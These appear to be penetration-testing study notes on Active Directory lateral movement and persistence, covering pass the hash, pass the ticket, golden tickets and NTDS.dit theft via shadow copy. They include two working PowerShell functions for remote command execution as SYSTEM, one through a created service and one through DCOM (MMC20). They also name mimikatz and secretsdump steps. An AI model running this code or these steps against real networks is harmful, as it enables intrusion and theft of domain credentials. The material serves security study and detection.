Content
Using password hashes or Kerberos tickets to authenticate to other machines in the AD domain
WMI and WinRM
used for remote management (WMI rides on DCOM/RPC, WinRM on HTTP(S) over TCP 5985/5986)
require local admin on the target (WinRM additionally accepts members of the Remote Management Users group)
PsExec
provides remote execution of processes on other systems (Sysinternals tool, requires local admin on the target)
conditions:
ADMIN$ share (C:\Windows) must be available
File and Printer Sharing must be turned on (SMB, TCP 445)
how does it work:
copies PSEXESVC.exe into the ADMIN$ share, i.e. into C:\Windows on the target
creates and starts a service (PSEXESVC) on the remote host over the service control manager
runs the requested command as a child process of PSEXESVC, then stops the service and deletes the binary
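The following PowerShell is an added example, not part of the original notes: it reproduces the PsExec mechanism by hand (check the two preconditions, create and start a remote service, clean up) using sc.exe instead of dropping PSEXESVC.exe. The host name FILES04, the service name and the output path are assumptions.

```powershell
# Added example: manual PsExec-style execution through a remote service.
# Assumes: we hold local admin on the target, SMB (TCP 445) is reachable,
# and sc.exe / Test-NetConnection are available on the attacking host.
function Invoke-ServiceExec {
    param(
        [Parameter(Mandatory)][string]$Target,        # e.g. 'FILES04' (assumed host name)
        [Parameter(Mandatory)][string]$Command,       # command to run as SYSTEM on the target
        [string]$ServiceName = 'UpdaterSvc'           # assumed, arbitrary service name
    )
    $outFile = 'Temp\svcexec.txt'                     # relative to C:\Windows, i.e. to ADMIN$

    # Precondition 1: File and Printer Sharing -> SMB on TCP 445 must answer
    if (-not (Test-NetConnection -ComputerName $Target -Port 445 -InformationLevel Quiet)) {
        throw "TCP 445 closed on $Target (File and Printer Sharing off or filtered)"
    }
    # Precondition 2: ADMIN$ (C:\Windows) must be reachable; only local admins of the target get in
    if (-not (Test-Path "\\$Target\ADMIN$")) {
        throw "ADMIN$ on $Target not accessible (not a local admin?)"
    }

    # PsExec would now copy PSEXESVC.exe into ADMIN$. We skip the upload and use
    # cmd.exe, which already exists on the target, as the service image.
    # Note the space after '=': sc.exe requires the form 'binPath= value'.
    $binPath = "cmd.exe /c $Command > C:\Windows\$outFile 2>&1"
    sc.exe \\$Target create $ServiceName binPath= $binPath start= demand type= own | Out-Null

    # Starting the service runs the command as SYSTEM. cmd.exe never talks to the
    # Service Control Manager, so 'sc start' reports error 1053 after the timeout,
    # but the command has already executed (PSEXESVC is a real service and avoids this).
    sc.exe \\$Target start $ServiceName | Out-Null

    # Clean up like PsExec does when it removes PSEXESVC, then collect the output via ADMIN$
    sc.exe \\$Target delete $ServiceName | Out-Null
    Get-Content "\\$Target\ADMIN$\$outFile"
}

# Usage: Invoke-ServiceExec -Target FILES04 -Command 'whoami'
```

Both sc.exe calls and the final read go through the same SMB/RPC channels PsExec uses, so the same detection artefacts apply: a service creation event (7045) on the target and a new file or cmd.exe spawned by services.exe.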
Pass the hash
many tools accept the NTLM hash in place of the password, because NTLM authentication only needs the hash, not the plaintext
-> passing the hash to gain access without cracking it; works for NTLM authentication only (SMB, WMI, WinRM, RDP with Restricted Admin) and still needs local admin on the target for remote execution
Overpass the hash
turns an NTLM hash into a Kerberos TGT: the hash is injected into a new logon session and the first Kerberos-authenticated access makes Windows request a TGT with it, which then allows us to authenticate against arbitrary services in the domain
can be done in mimikatz (sekurlsa::pth), requires local admin on the machine where we inject the hash
Pass the ticket
Kerberos tickets cached in a logon session can be exported and injected into another session: Pass the ticket
a TGT is tied to the logon session it was issued to; a TGS is scoped to a single service and, once exported, can be used from other sessions
if the TGS belongs to the current user, we do not need admin privs to export it; tickets of other users' sessions live in LSASS and require local admin
Example:
dave has access to the SMB share BACKUP and has an open session on the host
jen can't access BACKUP
export dave's TGS for the share and inject it into jen's session; jen then reaches BACKUP with dave's ticket
DCOM
"Distributed Component Object Model"
Microsoft system for creating distributed software components that interact with each other across hosts
uses RPC (endpoint mapper on TCP 135 plus a dynamic high port); activating an object on a remote host requires local admin there
DCOM lateral movement via MMC
MMC20.Application is a DCOM object that exposes the Microsoft Management Console for scripted automation
can be used for lateral movement: instantiate the object on the remote host, which spawns mmc.exe there
abuses the Document.ActiveView.ExecuteShellCommand method of that object to run an arbitrary command on the remote host
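The DCOM path described above as an added PowerShell example (not code from the original notes). It wraps the MMC20.Application activation and the ExecuteShellCommand call in a function; the placeholder address 192.0.2.10, the payload and the output path are assumptions.

```powershell
# Added example: lateral movement over DCOM using the MMC20.Application object.
# Assumptions: we run as a user who is a local admin on the target, the target is
# reachable on TCP 135 plus the RPC dynamic port range, and 192.0.2.10 is its
# (placeholder) address. The payload only writes 'whoami' output to a file.
function Invoke-MmcDcomExec {
    param(
        [Parameter(Mandatory)][string]$Target,    # IP or host name of the remote machine
        [Parameter(Mandatory)][string]$Arguments  # cmd.exe arguments, e.g. '/c whoami > C:\Windows\Temp\dcom.txt'
    )
    # DCOM activation happens over RPC; the endpoint mapper on 135 must be reachable
    if (-not (Test-NetConnection -ComputerName $Target -Port 135 -InformationLevel Quiet)) {
        throw "RPC endpoint mapper (135) not reachable on $Target"
    }
    # Resolve the MMC automation object's type on the REMOTE host and instantiate it there.
    # This needs local admin on the target; otherwise CreateInstance fails with access denied.
    $mmc = [System.Activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application', $Target))
    try {
        # Document.ActiveView.ExecuteShellCommand(Command, Directory, Parameters, WindowState)
        # runs a program on the remote host as a child of mmc.exe, in our user's context.
        # WindowState '7' = minimized so nothing pops up on an interactive desktop.
        $mmc.Document.ActiveView.ExecuteShellCommand('cmd.exe', $null, $Arguments, '7')
        Start-Sleep -Seconds 2                    # give the short payload time to finish
    }
    finally {
        # Quit the remote MMC instance so mmc.exe does not linger on the target,
        # then drop the COM proxy on our side.
        try { $mmc.Quit() } catch { }
        [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($mmc)
    }
}

# Usage (placeholder address): the output file then sits on the target and can be read via ADMIN$
# Invoke-MmcDcomExec -Target 192.0.2.10 -Arguments '/c whoami > C:\Windows\Temp\dcom.txt'
# Get-Content '\\192.0.2.10\ADMIN$\Temp\dcom.txt'
```

The process tree on the target (svchost.exe for DcomLaunch -> mmc.exe -> cmd.exe) is the characteristic artefact of this technique and is what a detection rule for MMC-based DCOM movement looks for.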
AD persistence
golden tickets
shadow copies
Golden Tickets
a TGT is encrypted and signed with the password hash of the krbtgt account
knowing the password hash of krbtgt,
we can forge arbitrary TGTs (golden tickets) on any machine and inject them into a session
this gives us access to arbitrary services in the domain, and the tickets stay valid until the krbtgt password is changed twice
e.g. a ticket which states that an unprivileged (or non-existent) user is a member of the Domain Admins group
Shadow Copy
Windows backup technology (Volume Shadow Copy Service) that allows the creation of snapshots of files or entire volumes, including files that are currently locked
vshadow.exe (Windows SDK tool; the version must match the OS) creates and lists shadow copies from the command line
attack:
as domain admin on the DC, we create a shadow copy of C: and copy NTDS.dit (the AD database) out of it, since the live file is locked by LSASS
NTDS.dit is encrypted with the boot key, so we also save the SYSTEM registry hive (reg save HKLM\SYSTEM)
with both files, we extract the hashes of all domain users offline on our local Kali (e.g. impacket secretsdump)